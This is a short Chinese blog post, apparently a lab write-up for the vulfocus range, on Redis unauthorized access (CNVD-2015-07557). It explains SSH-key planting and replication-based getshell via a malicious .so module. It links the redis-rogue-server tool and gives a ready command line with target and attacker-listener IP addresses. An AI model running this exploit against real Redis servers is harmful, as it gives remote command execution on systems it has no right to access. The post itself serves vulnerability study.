首页 > 数据库 >vulfocus redis 未授权访问 (CNVD-2015-07557)

vulfocus redis 未授权访问 (CNVD-2015-07557)

时间:2022-12-02 16:01:33浏览次数:52  
标签:redis vulfocus -- CNVD Redis server 访问 rogue

一、简介
1.Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。

2.Redis默认端口:6379,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中,进而可以直接登录目标服务器。
二、漏洞复现
目标系统的权限不够redis用户无法写计划任务和公钥,而且也没有开放ssh端口。
主从复制getshell,写入恶意的so文件达到执行系统命令的目的。
github上有一键可以利用的脚本
https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-server/

python3 redis-rogue-server.py --rhost 123.58.224.8 --rport 42491 --lhost 124.222.144.244

 

 qq号:2247360894





标签:redis,vulfocus,--,CNVD,Redis,server,访问,rogue
From: https://www.cnblogs.com/sentouceshi/p/16944719.html

相关文章

  • redis sentinel部署(Windows下实现)
    一、准备条件二、下载redis并解压  2.1、下载  2.2、解压三、HA配置四、新建和修改配置文件  4.1、修改redis.conf配置文件  4.2、创建并修改sentinel.conf......
  • 数据库面试题--Redis
    Redis1.什么是Redis?简述它的优缺点?2.Redis相比memcached有哪些优势?3.Redis有哪些数据结构?4.Redis主要消耗什么物理资源?5.Redis的全称是什么?6.一个字符串类型的值能......
  • Springboot 整合 SpringCache 使用 Redis 作为缓存
    一直以来对缓存都是一知半解,从没有正经的接触并使用一次,今天腾出时间研究一下缓存技术,开发环境为OpenJDK17与SpringBoot2.7.5源代码下载地址:https://hanzhe.lanzoue.com/i......
  • Docker Swarm 安装 Redis 集群(bitnami/redis-cluster:latest)
    准备集群环境:​​docker-79​​​、​​docker-80​​​、​​docker-81​​拉取镜像:dockerpullbitnami/redis-cluster:latest3.在任意文件夹下新建compose.yml脚本:​......
  • Docker 搭建redis集群-三台机机器、三主三从
    1.拉取redis镜像这里我使用的是之前打包的镜像,redis版本是:​​6.2.0​​直接拉取也行:dockerpullredis:latest三台服务器:​​192.168.104.79​​​、​​192.168.104.80​......
  • Redis 持久化 RDB
    RDB持久化是把当前进程数据生成快照保存到硬盘的过程,触发RDB持久化过程分为手动触发和自动触发。手动触发分别对应save和bgsave命令:·save命令:阻塞当前Redis服务器,线......
  • Windows下Redis安装与配置的两种方式
    原文链接:https://blog.csdn.net/HQqHQhqqhq/article/details/127903697安装和配置RedisRedis的安装有两种安装形式,一种是安装包式,另一种是压缩包注意:windows没有32位的,所......
  • (收藏)Java中使用Jedis操作Redis
    使用Java操作Redis需要jedis-2.1.0.jar如果需要使用Redis连接池的话,还需commons-pool-1.5.4.jarpackagecom.test;importjava.util.HashMap;import......
  • Redis中的单线程多路复用的一个通俗解析
    在尚学堂的课程中,有个不错的单线程多路复用的通俗解析,觉得不错:其实就是黄牛买票,黄牛是单线程了,但他能服务很多买票的人,买票的人也不需要去等待的 ......
  • Redis缓存雪崩
    缓存处理流程接收到查询数据请求时,优先从缓存中查询,若缓存中有数据,则直接返回,若缓存中查不到则从DB中查询,将查询的结果更新到缓存中,并返回查询结果,若DB中查不到,则返回空数据......